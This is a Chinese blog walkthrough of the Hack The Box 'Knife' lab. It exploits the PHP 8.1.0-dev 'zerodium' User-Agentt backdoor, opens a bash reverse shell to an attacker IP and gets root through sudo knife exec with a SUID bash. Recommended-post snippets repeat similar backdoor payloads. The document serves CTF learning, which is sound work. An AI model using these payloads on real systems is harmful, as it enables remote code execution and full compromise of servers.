HackTheBox-Knife

最新推荐文章于 2023-12-26 08:54:09 发布
最新推荐文章于 2023-12-26 08:54:09 发布
阅读量284 收藏
点赞数
分类专栏: # Hack The Box 文章标签: HackTheBox 渗透测试 linux 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119856850
版权

HackTheBox-Knife

连接配置

渗透测试

信息搜集

  • 先用 Namp 扫描一下目标靶机,发现开放了 22、80 两个端口
sudo nmap 10.10.10.242
  • dirb 扫描网站发现没有什么有用信息

漏洞挖掘

联想到题目名字应该是存在后门,查看源码和抓包分析后发现存在 PHP/8.1.0-dev,该版本在2021年3月28日被植入后门,当服务器存在该后门时攻击者可以通过发送 User-Agentt 头来执行任意代码

  • 使用 burpsuite 抓包,并加入字段 User-Agentt: zerodiumvar_dump(2*3);,发现被成功执行

getshell

  • 起一个 nc 监听, 然后执行命令 User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.16.21/1234 0>&1'");,并将 shell 换成一个交互式的 shell
python3 -c 'import pyt;pty.spawn("/bin/bash")'
或者
SHELL=/bin/bash script -q /dev/null
  • 查看用户 James 家目录下拿到 USER OWN 的 flag

提权

  • 利用 sudo -l 进行提权,确定 knife 用户的 sudo 权限
sudo -l
ls /usr/bin/knife -al
  • 执行命令,拿到 root 权限,在 root 目录下拿到 SYSTEM OWN 的 flag
echo "system('chmod +s /bin/bash')" > exploit.rb
sudo /usr/bin/knife exec exploit.rb
/bin/bash -p
H3rmesk1t
关注
专栏目录
paddle 56 将图像分类模型嵌入到目标检测中并实现端到端的部署(用图像分类模型进行目标检测切片分类)
a486259的博客
12-24 1438
目标检测在功能上一直是涵盖了图像分类的,其包含目标切片检测,目标切片分类。由于某些原因,需要将目标检测的功能退化为检测,忽略其切片分类,使用外部的分类模型。然而这样操作会使得其与原始的部署代码不兼容,为此博主实现将图像分类模型嵌入到目标检测中,并实现端到端的部署。这里以ppyoloe模型为改造案例,关于图像分类模型可以使用任意PaddleClas支持的模型。关于构造PaddleClas模型可以查阅。
测试集(2)-words
热门推荐
马如林的IT博客
11-26 5万+
 aa.ma.mabandonabandonabattoirabilityabilityableableabnormalabnormalaboardaboardaboutaboutaboveaboveabracadabraabroadabroadabsenceabsenceabsentabsent
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 636
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
Hack the Box Knife 靶机渗透
Shadow的博客
07-23 293
Knife靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-23 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 Nikto查看漏洞,发现php版本8.1.0 查找是否有已知漏洞exploit PHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 653
如果你也想学习:黑客&网络安全的SQL攻防。
php-8.1.0 开发版后门复现
lionwerson的博客
06-02 701
1
TensorFlow-Keras预训练模型测试
信道者
07-06 1万+
在tf.keras.applications里有多个预训练的模型类。这些类继承了tf.keras.Model类,使用比较方便。在实例化这些类之后,程序会自动下载参数,存储于本地硬盘。本文测试了这些预训练模型,并发现测试结果普遍差于论文声称结果。
TensorFlow北大公开课学习笔记8-复现vgg16并实现图片识别
qq_37791134的博客
11-06 3748
https://www.cs.toronto.edu/~frossard/post/vgg16/ 】img_ready = re_img.reshape((1, 224, 224, 3)) ValueError: cannot reshape array of size 200704 into shape (1,224,224,3)因为图片是四通道的,为啥?224*334*4=200704 ...
python瓦登尔湖词频统计
weixin_30500105的博客
11-01 5676
#瓦登尔湖词频统计: import string path = 'D:/python3/Walden.txt' with open(path,'r',encoding= 'utf-8') as text: words = [raw_word.strip(string.punctuation).lower() for raw_word in text.read().split()...
vulhub 8.1-backdoor漏洞复现
qq_46804551的博客
05-26 711
前言 PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。 复现 用vulhub搭好环境后 在请求头中构造如下payload User-Agentt: zerodiumvar_dump(233*233); 执行系统命令: ...
PHP-8.1.0-dev 后门命令执行漏洞复现
m0_48520508的博客
06-16 2174
0x00漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 0x01影响范围 PHP 8.1.0-dev 0x02环境搭建 1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址: https://github.com/vulhub/vulhub 2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录 c
PHP zerodium后门漏洞
课嗨教育的专栏
04-27 880
漏洞类型 任意代码执行 触发条件 提交的请求包中,如果字符串以'zerodium'开头,那么该行将从useragent HTTP标头(“ HTTP_USER_AGENTT”)中执行PHP代码
2021-DASCTF-三月赛-Writeup
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 981
vulhub漏洞复现练习篇
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4899
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
2021虎符CTF-Web前三题
Y4tacker的博客
04-04 1556
文章目录web签到unset慢慢做管理系统 web 签到 一个最近刚爆出来的php后门,直接一把梭 User-Agentt: zerodiumsystem("cat /flag"); unset 一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻 syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.ph
HTTP头文件User-Agent解读
淮海工学院 缠小溪(Java/C++)
07-22 1504
什么是User-Agent User-Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示,但通过伪装 UA 可以绕过检测。 浏览器的UA字串 标准...
一文吃透Linux提权
weixin_45727359的博客
11-07 2504
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
Python库dhis2-pocket-knife v0.13.1发布
资源摘要信息:"Python库 | dhis2-pocket-knife-0.13.1.tar.gz" 知识点一:Python编程语言 Python是一种广泛使用的高级编程语言,以其清晰的语法和强大的功能而受到开发者的青睐。Python的设计哲学强调代码的可读性...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值